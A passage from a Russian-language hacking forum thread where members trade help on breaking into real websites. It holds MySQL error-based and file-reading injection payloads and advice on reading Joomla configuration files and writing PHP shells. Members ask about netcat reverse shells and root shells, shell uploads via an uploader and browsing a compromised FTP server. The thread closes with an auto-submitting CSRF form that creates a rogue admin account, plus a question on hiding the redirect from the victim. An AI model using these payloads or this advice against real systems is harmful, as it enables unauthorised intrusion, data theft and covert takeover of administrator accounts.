Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    'INTO OUTFILE' hex не воспринимает, недавно же это писали
     
    _________________________
    ACat likes this.
  2. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    если это тот же сайт, на котором даже урлдекода нет, но сомневаюсь что оно фильтруется, скорее всего прав на запись не хватает, проверь вообще работает ли оно(в /tmp по дефолту запись есть у всех)
    Code:
    select 'test' from(select 1)x INTO OUTFILE '/tmp/qqq'
    select load_file('/tmp/qqq')
    
    если не работает, то забить на этот вектор, искать другое
    хз ещё как апач/etc настроен, файл если и создастся - то из под юзера мускул, не факт что будет работать
     
    _________________________
  4. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    нет. на том нет mysql привилегий на запись, сейчас говорю о другом. и в данном случае ' фильтруются, поэтому приходится в hex переводить.
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    hex не катит, читай файлы сайта, может что интересное встретится
     
    _________________________
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Есть ещё пару вариантов, хотя с 0x272f6562616c2f74766f752f6d616d6b752f62726f2e74687827 нету вариантов, жаль
     
  7. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    вывода нет, только error based. типа:
    Code:
    OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))-- 
    Code:
    OR ExtractValue(1,concat(0x5c,(VERSION())))--
    в них файл не отображается, просто страница грузится в рабочем режиме.
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    error-based тоже вывод)
    чтение файла можно и через boolean проверить конструкцией length(load_file('/etc/shells'))>0 , ну так, может когда пригодится

    файл кстати какой читал? может там open_basedir, если докрут известен - попробуй index.php прочитать
     
    _________________________
    crlf and exT1ma4ka like this.
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    читай конфиги сервера, ищи полный путь до сайта, читай конфиги сайта (возможно есть пхпмайадмин), может на соседних сайтах есть пхпмайадмин, записывай через пыху шелл, может возможно удаленное подключение к мускулю.
     
    exT1ma4ka likes this.
  10. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    пути известны.
    /../../public_html/configuration.php (joomla)
    результат не виден. просто рабочая страница. даже если имя файла в запросе изменить на неправильное.

    но опять таки, внутри LOAD_FILE(тут) - мне приходится конструкцию с путями и кавычками писать в hex, ибо ' фильтруются.
     
  11. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Вместо INTO OUTFILE можно использовать INTO DUMPFILE.
     
    exT1ma4ka likes this.
  12. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Такой вопрос, пытаюсь поднять backconnect ,но не работает ни С и perl python скрипты, то есть 0 на массу при попытке соединения, но если пробую через php скрипт соединения появлсятся и сразу пропадает , netcat ставлю с таками параметрами -lvnp 443 -lvp 443 ( пробовал разные порты, смотрел какие порты открыты на сервере), но всеравно результат один и тот же, соединение появляется и сразу netcat вылетает. В какую сторону копать?
    Вот модули что есть на серве
    Code:
    Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_auth_digest, mod_authn_file, mod_authn_alias, mod_authn_anon, mod_authn_dbm, mod_authn_default, mod_authz_host, mod_authz_user, mod_authz_owner, mod_authz_groupfile, mod_authz_dbm, mod_authz_default, util_ldap, mod_authnz_ldap, mod_include, mod_log_config, mod_logio, mod_env, mod_ext_filter, mod_mime_magic, mod_expires, mod_deflate, mod_headers, mod_usertrack, mod_setenvif, mod_mime, mod_dav, mod_autoindex, mod_info, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_actions, mod_speling, mod_userdir, mod_alias, mod_substitute, mod_rewrite, mod_proxy, mod_proxy_balancer, mod_proxy_ftp, mod_proxy_http, mod_proxy_ajp, mod_proxy_connect, mod_cache, mod_suexec, mod_disk_cache, mod_cgi, mod_version, mod_php5, mod_apreq2, mod_rpaf, mod_perl
    
    И 2й вопрос, если я успешно получаю рут права как мне сделать шел что б запускался от рута, а не от apacha?
     
  13. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно
    В заголовке написано Uplodify Test .
    При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,
    Но точно ли он загружает или для виду,это же,типо тест...
    А если и загружает то куда,непонятно.Как узнать?

    И ещё вопрос я попал на FTP
    ftp://***-***-***-**.*****.******.***
    Могу всякие файлы читать,но файлов слишком много,аж лагает .
    Есть ли какие-нибудь программы для скана директорий FTP?
     
    #1993 SaNDER, 17 Jul 2017
    Last edited: 17 Jul 2017
  14. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    1) Брутить стандартные пути папки upload, images, avatrs и прочее у можно dirb'у скормить словарь. Второй потыкать форум на предмет FPD(Открытие пути файла), Третий, скачать фреймворк с паблика и посмотреть куда он льет по дефолту.
     
    _________________________
    ghost8 likes this.
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Изучал атаку xss через svg все показалось просто но почему на том же hackerone такие атаки мение цены чем стандартные xss на томже ютубе ненахожу примеры кражи куков через svg, я что то недопонимаю ?
     
  16. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Говорит ли наличие такой ошибки о sql-inj?
    Code:
    syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20
     
  17. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    не обязательно.
     
  18. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Как подключиться к InterBase?
    Логин и пароль знаю,а как подключиться нет .
    IBConsole запустил и понять в ней ничего не могу.Версия новая .
     
    #1998 SaNDER, 28 Jul 2017
    Last edited: 28 Jul 2017
  19. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Подскажите webshell для windows с backconnect'ом в комплекте
    PS на сервере php,node
    или отдельно backconnect с примером его запуска
     
  20. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Делаю POST CSRF
    Code:
    <html>
    <body onload="document.csrf.submit()">
    <form action="http://site/cp/newuser/" name="csrf" method="POST">
    <input type="hidden" name="login" value="hack">
    <input type="hidden" name="newp" value="hack">
    <input type="hidden" name="newp1" value="hack">
    </form>
    </body>
    </html>
    Все срабатывает отлично но после атаки админа редиректит в /users/ и он спалит нового админа так вот как поменять и этот редирект?